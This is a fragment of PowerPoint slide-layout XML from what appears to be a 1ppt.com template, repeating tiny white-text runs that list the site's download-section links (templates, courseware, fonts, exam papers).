              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout210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10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10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10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1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11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11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11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11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11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11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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout211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11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11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11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1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12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12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12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12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12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12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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout212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12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12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12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1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13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13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13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13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13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13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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
